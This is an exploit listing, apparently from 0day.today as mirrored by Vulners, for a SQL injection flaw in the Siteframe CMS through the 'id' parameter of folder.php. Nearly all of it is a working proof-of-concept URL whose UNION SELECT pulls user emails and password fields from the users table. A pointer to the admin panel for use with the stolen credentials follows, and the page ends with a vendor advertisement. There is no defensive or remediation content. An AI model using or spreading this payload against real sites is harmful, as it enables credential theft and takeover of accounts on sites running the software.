Siteframe remote SQL injection vulnerability in folder.php i
============================================================
Siteframe (folder.php id) Remote SQL Injection Vulnerability
============================================================
###############################
#Vulnerable script: folder.php#
#Vulnerable var: id############
####################
########################################
#CMS Homepage: http://www.siteframe.org#
########################################
##########################################################################################################################################################
#Exploit PoC: #http://www.target.com/folder.php?id=370+and(1=2)+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,user_email,user_passwd),10,11# #+from+users--# ########################################################################################################################
##########################################################################################################################################################
#########################################################################################################
#Admin panel: http://www.target.com/admin/ (but previously you gotta log in as administrator on website)#
#########################################################################################################
###################################################
# 0day.today [2018-01-04] #
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo